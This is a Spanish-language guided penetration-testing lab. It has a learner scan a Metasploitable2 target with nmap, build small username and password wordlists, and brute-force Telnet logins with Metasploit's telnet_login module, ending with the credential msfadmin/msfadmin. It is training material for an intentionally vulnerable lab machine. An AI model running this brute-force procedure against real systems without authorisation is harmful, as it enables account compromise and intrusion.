Explotación de la Vulnerabilidad del Servicio Telnet con Metasploit

NmapBeginner
Practicar Ahora

Introducción

En este laboratorio, aprenderemos cómo explotar la vulnerabilidad del servicio Telnet y realizar un ataque de penetración. El escenario implica utilizar la máquina Kali Linux como máquina de ataque y la máquina virtual Metasploitable2 como máquina objetivo. El objetivo es escanear la máquina objetivo en busca de vulnerabilidades, identificar la vulnerabilidad del servicio Telnet y explotarla utilizando el Framework Metasploit.

Este es un Guided Lab, que proporciona instrucciones paso a paso para ayudarte a aprender y practicar. Sigue las instrucciones cuidadosamente para completar cada paso y obtener experiencia práctica. Los datos históricos muestran que este es un laboratorio de nivel principiante con una tasa de finalización del 93%. Ha recibido una tasa de reseñas positivas del 83% por parte de los estudiantes.

Iniciar el entorno de laboratorio

En este paso, iniciaremos el entorno de laboratorio, que incluye el contenedor de Kali Linux y la máquina virtual Metasploitable2.

  1. Abra una terminal xfce en la máquina host de LabEx e inicie la máquina objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2

Espere a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Pruebe la conectividad a la máquina objetivo realizando un ping:
ping 192.168.122.102

Presione Ctrl+C para detener el ping.

  1. Inicie el contenedor de Kali Linux y acceda al entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro del contenedor de Kali, pruebe la conexión de red a la máquina objetivo:
ping 192.168.122.102

Presione Ctrl+C para detener el ping.

Ahora tanto la máquina de ataque como la máquina objetivo están en funcionamiento, y puede comenzar la prueba de penetración.

Nota: Si sale accidentalmente del bash actual, el contenedor de Kali se detendrá automáticamente. Puede ejecutar docker run -ti --network host b5b709a49cd5 bash nuevamente en la máquina host para iniciar un nuevo contenedor de Kali y acceder a bash para continuar con el experimento.

Realizar un escaneo de vulnerabilidades

En este paso, utilizaremos Nmap para escanear la máquina objetivo en busca de puertos abiertos y servicios.

Primero, inicie la base de datos PostgreSQL, ya que Metasploit la requiere para el almacenamiento de datos:

service postgresql start
msfdb init
cd ~
msfconsole

Dentro de la consola de Metasploit, ejecute el escaneo Nmap contra la máquina objetivo:

nmap -sV -T4 192.168.122.102

La opción -sV escanea los puertos abiertos y muestra información detallada sobre los puertos, mientras que -T4 establece la política de temporización del escaneo (0 - 5, valores más altos son más rápidos pero más ruidosos).

Analizar los resultados del escaneo

En este paso, analizaremos los resultados del escaneo de Nmap para identificar el servicio Telnet vulnerable.

La salida del escaneo de Nmap muestra que el servicio Telnet está funcionando en el puerto 23 con el banner "Linux telnetd". Busquemos el módulo correspondiente de Metasploit:

search scanner/telnet

Utilice el módulo auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Muestre las opciones del módulo:

show options

La opción requerida es RHOSTS, que especifica el/los host(s) objetivo(s).

Presione Ctrl+D para salir de la consola de Metasploit y luego inicie la inspección

Preparar el diccionario de nombres de usuario y contraseñas

En este paso, prepararemos los archivos de diccionario de nombres de usuario y contraseñas para el ataque de fuerza bruta de inicio de sesión.

Abra una nueva terminal y conéctese al contenedor de Kali:

docker run -ti --network host b5b709a49cd5 bash

Cree un archivo username.txt en el directorio / con los siguientes nombres de usuario:

123456
admin
msfadmin
root
kali

Cree otro archivo password.txt en el directorio / con las siguientes contraseñas:

abc123
1234
123456
root
msfadmin
admin
toor

Estos archivos se utilizarán como diccionarios de nombres de usuario y contraseñas para el ataque de fuerza bruta.

Configurar el módulo de Metasploit

En este paso, configuraremos el módulo de Metasploit con el host objetivo, el diccionario de nombres de usuario y el diccionario de contraseñas.

En primer lugar, si no está en la consola de Metasploit, debe iniciar la consola de Metasploit:

cd ~
msfconsole

Utilice el módulo auxiliary/scanner/telnet/telnet_login:

use auxiliary/scanner/telnet/telnet_login

Establezca el host objetivo:

set RHOSTS 192.168.122.102

Establezca el archivo del diccionario de nombres de usuario:

set USER_FILE /username.txt

Establezca el archivo del diccionario de contraseñas:

set PASS_FILE /password.txt

Por último, ejecute el exploit:

exploit

Metasploit comenzará a probar diferentes combinaciones de nombres de usuario y contraseñas de los diccionarios proporcionados. Si se encuentra una credencial válida, se mostrará en verde.

En este caso, la credencial válida es msfadmin/msfadmin.

Presione Ctrl+D para salir de la consola de Metasploit y luego inicie la inspección

Resumen

En este laboratorio, aprendimos cómo explotar la vulnerabilidad del servicio Telnet utilizando el Framework Metasploit. Comenzamos configurando el entorno de laboratorio con la máquina de ataque Kali Linux y la máquina objetivo Metasploitable2. Luego, realizamos un escaneo de vulnerabilidades utilizando Nmap para identificar el servicio Telnet abierto. A continuación, preparamos los diccionarios de nombres de usuario y contraseñas y configuramos el módulo de Metasploit con el host objetivo y los archivos de diccionario. Finalmente, ejecutamos el exploit y logramos forzar por fuerza bruta las credenciales de inicio de sesión de Telnet.

Este laboratorio proporcionó experiencia práctica en pruebas de penetración, escaneo de vulnerabilidades y utilización del Framework Metasploit para explotar vulnerabilidades. Destacó la importancia de prácticas seguras de contraseñas y los riesgos potenciales de utilizar credenciales débiles o fáciles de adivinar.